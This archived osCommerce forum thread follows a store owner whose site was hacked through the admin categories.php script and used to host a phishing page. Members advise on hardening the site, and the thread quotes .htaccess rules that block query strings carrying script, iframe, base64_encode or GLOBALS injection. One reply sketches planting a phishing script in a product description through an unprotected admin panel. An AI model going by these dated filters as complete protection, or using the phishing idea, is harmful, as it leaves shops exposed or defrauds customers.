Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Vulnerability in categories.php


simonjcook

Recommended Posts

My Web site was shut down yesterday by my hosting provider after a successful hacking attempt through categories.php.

 

"... your webspace was attacked via a security leak in your software. As a result of this attack, a phishing site had been uploaded and was to be found on your webspace."

 

I have implemented Security Pro, renamed the admin folder, deleted file_manager.php and define_language.php as per the following article;

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

I am running osCommerce v2.2 rc2a, that's as new as it gets without running the v3 alpha...

Are the osCommerce development team aware of the vulnerabilities and is there fix in development?

 

Apparently the technique the hackers used was remote file inclusion.

http://en.wikipedia.org/wiki/Remote_File_Inclusion

 

Best regards,

 

Simon

Link to comment
Share on other sites

My Web site was shut down yesterday by my hosting provider after a successful hacking attempt through categories.php.

 

"... your webspace was attacked via a security leak in your software. As a result of this attack, a phishing site had been uploaded and was to be found on your webspace."

 

I have implemented Security Pro, renamed the admin folder, deleted file_manager.php and define_language.php as per the following article;

http://forums.oscomm...cure-your-site/

 

I am running osCommerce v2.2 rc2a, that's as new as it gets without running the v3 alpha...

Are the osCommerce development team aware of the vulnerabilities and is there fix in development?

 

Apparently the technique the hackers used was remote file inclusion.

http://en.wikipedia...._File_Inclusion

 

Best regards,

 

Simon

 

 

You need to do all the security snippits detailed in that thread, not just some of them, whats the point of locking the door but leaving windows open?

 

I would suspect your leak was through file_manager.php, what makes you think it was categories, & what evedence of that route was supplied.

 

Make sure you fully secure your admin, renaming is not sufficient. Also don't forget the other details given on preventing admin hacks. wink.gif

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Thanks Sam,

 

I appreciate your advice.

I will install SiteMonitor in due course.

I'm not planning to use IP trap at present.

I downloaded the htaccess zip file but couldn't figure out what to do with it once unzipped.

I was expecting individual files to drop into the appropriate folders to lock them down.

It looks like something I'd want to use.

I will install the anti XSS add-in in due course.

All files have permissions 644

All folders have permssions 755

I can't password protect the admin folder as there does not appear to be the facility.

 

The hosting provider highlighted categories.php as the source of the intrusion in their analysis of the incident.

"1.1 The intrusion was processed via your script/s:

./<path removed>/admin/categories.php"

Link to comment
Share on other sites

Thanks Sam,

 

I appreciate your advice.

I will install SiteMonitor in due course.

I'm not planning to use IP trap at present.

I downloaded the htaccess zip file but couldn't figure out what to do with it once unzipped.

I was expecting individual files to drop into the appropriate folders to lock them down.

It looks like something I'd want to use.

I will install the anti XSS add-in in due course.

All files have permissions 644

All folders have permssions 755

I can't password protect the admin folder as there does not appear to be the facility.

 

The hosting provider highlighted categories.php as the source of the intrusion in their analysis of the incident.

"1.1 The intrusion was processed via your script/s:

./<path removed>/admin/categories.php"

 

 

If your admin is not password protected then clearly anyone can access any file they wish!!

 

Within your hosting cpanel select 'password protect directories' , select your re-named admin folder & complete the process, hey presto you have pw protection!! thumbsup.gif

 

The default text that you get on the osc install does tell you to do that!! ohmy.gif

 

It sounds like you need to read this: How do I install a contribution http://www.oscommerce.com/forums/index.php?showtopic=343384&st=0#entry1432157

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

looks like the hacker and/or the host is stupid: if one can get into admin or you allow anyone to get to admin, ie, it opens to the world, then you dont need any sort of "exploit", just edit a product and enter a script in the description saying, eg, click to claim 50% discount...job done! sit back and wait for the "fish" to come!

Ken

commercial support - unProtected channel, not to be confused with the forum with same name - open to everyone who need some professional help: either PM/email me, or go to my website (URL can be found in my profile).

over 20 years of computer programming experience.

Link to comment
Share on other sites

I found the password protection facility in my hosting control panel, thank you for your persistence in recommending that.

Can you see my screen wink.gif

 

I've implemented the anti-xss fix recommended in http://addons.oscommerce.com/info/6546 rather than http://addons.oscommerce.com/info/6044

 

Please see my comments here on the relative merits. (11 Nov Post if link trouble) wink.gif

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

Hi Sam,

 

What version of that XSS contribution do you suggest (by Date) as there are a few to choose from - eventually in suggesting the other XSS contribution.

 

Thanks

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Link to comment
Share on other sites

Hi Sam,

 

What version of that XSS contribution do you suggest (by Date) as there are a few to choose from - eventually in suggesting the other XSS contribution.

 

Thanks

 

 

As i also stated in that thread, I only use the htaccess parts of that contrib, its called 'other version' wink.gif

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

The htaccess part of the anti-xss post is;

 

# 1) add these lines to your .htaccess file
# 2) create an index_error.php file with whatever content you want to be displayed.

Options +FollowSymLinks
RewriteEngine On 
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

 

I'm pretty new to the use of .htaccess but from what I can see it controls the behaviour of what can happen in each folder in the web site structure.

Consequently this code needs to be added to the .htaccess file in every folder presumably?

Regarding the index_error.php page,

Do there need to be multiple copies of that file (one in every folder where the .htaccess file is located) or can they all point to a single location?

 

It begs the question why all these measures aren't bundled into the current osCommerce distribution?

My site got humped <14 days after putting osCommerce in, before that I had phpbb in place since 2004 and have never been hacked.

It seems pretty fundamental to me build security into the package from the start, a release of osCoommerce 2.2 rc3 perhaps, rather than patching it up afterwards?

Mind you, to partially answer my own question the data in phpbb3 does not include payment details.

This probably attracts hackers.

Bearing that in mind why have the osCommerce link at the bottom of the page?

I appreciate it's there to advertise the application but is also an instruction to any bot or spider on how to go about hacking the site.

 

Rambling on a bit more I noted that none of the tables in osCommerce have a prefix as phpbb does, i.e. phpbb_bbcodes.

This makes the database structure subsceptable to accidental overwrites if you're installing other applications in the same database.

I appreciate that some would say keep the db's seperate but some of us don't have that facility.

 

Grumbles aside I still think osCommerce is a pretty awesome application, it just needs a few tweaks and changes to make it a truly awesome application.

 

btw Sam - your avatar is from Baldur's Gate I believe?

Link to comment
Share on other sites

 

 

Any htaccess file places in the root will apply to all sub-dirs unless they contain a file with replacement rules.

 

your error page would normally be in ther root, you can set it with htaccess too.

 

 

ErrorDocument 404 /error.php

 

assumes error.php is your file in the root

 

Are you sure you are running rc2a, rc2a has admin login, only ms2 & ealier did not.

 

As I stated the default text that you get on the osc install does tell you to secure your admin!! You ignore such info at your own peril.

 

 

osC provides a basic framework for you to work on, but its up to you to research whats is needed for your site, that includes security, its not too hard, the answers are readily available here, its just that too many can't be bothered to check!. crying.gif

 

 

I do get a little impatient with those that say why isn't this or that done for me already, its free software with free support, so somewhat gauling when some behave like it was a commercial package they bought!!. For anything to be added requires someone to give their time and expertese to do so, is it fair to insist 'they must/should have done this/that.

 

 

Remember you must take responsibilty for your site & your customers data, any failure in that is not the fault of anyone else!! wink.gif

 

 

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

You misconstrue me Sam,

 

I have not demanded or insisted, I am merely expressing an opinion in an open forum.

I can't be the only person in the community who thinks that it would be a good idea to roll these security measures into a new release candidate package surely?

Especially when they seem so fundamental to improving the security of the application.

I have nothing but admiration for those that have better knowledge or experience than myself and am extremely grateful for any help rendered.

 

Back on topic,

I read up on .htaccess and found as you rightly said that it has an inheritance model.

So I've put the above code in the root of the oscommerce install (as you've suggested) and it should apply to all subfolders.

 

Indeed I am using version 2.2 rc2a.

It says on the download page that rc2a was released on 30th January 2008.

That's nearly 2 years without a security roll-up and new distribution or at least going from release candidate to a full release.

 

I asked for example code as I'm sure one of the community members has already done this and it seems pointless to re-invent the wheel.

 

Many thanks for your help :)

Link to comment
Share on other sites

I'd agree it's a pity that fixes for known issues haven't been rolled up in to a further release since RC2.2a came out, but this is just to point out that the .htaccess you'll want to put in your catalog root is not the only .htaccess you'll probably want. You need to secure your admin, and it is recommended that this should be password protected. You won't want to password protect the front end of your store, so you need an additional and different .htaccess on the admin side.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Link to comment
Share on other sites

Thanks Ben,

 

I've used the password protection facility my hosting service provides to lock down the admin folders so I'm covered there.

 

 

Just so your clear, what that does is add a htaccess access file in your admin folder that requires the authentication, it uses a .htpasswd file placed eleswhere, so when u find that there, don't delete/replace it. wink.gif

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

  • 5 weeks later...

Any htaccess file places in the root will apply to all sub-dirs unless they contain a file with replacement rules.

 

your error page would normally be in ther root, you can set it with htaccess too.

 

 

ErrorDocument 404 /error.php

 

assumes error.php is your file in the root

 

 

 

I'm working trying to get all the suggested security measures mentioned in place, but it seems like I run into a little something that confuses me on each one. I can understand item #1 about adding the 10 lines to the .htaccess, but still unclear about what to do with #2. Do I create a php file called index_error.php and just insert a string of text that says ErrorDocument 404 /error.php ?

 

 

All this is enough to give a newbie a headache. Why did I promise the wife to get her a website up? :)

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...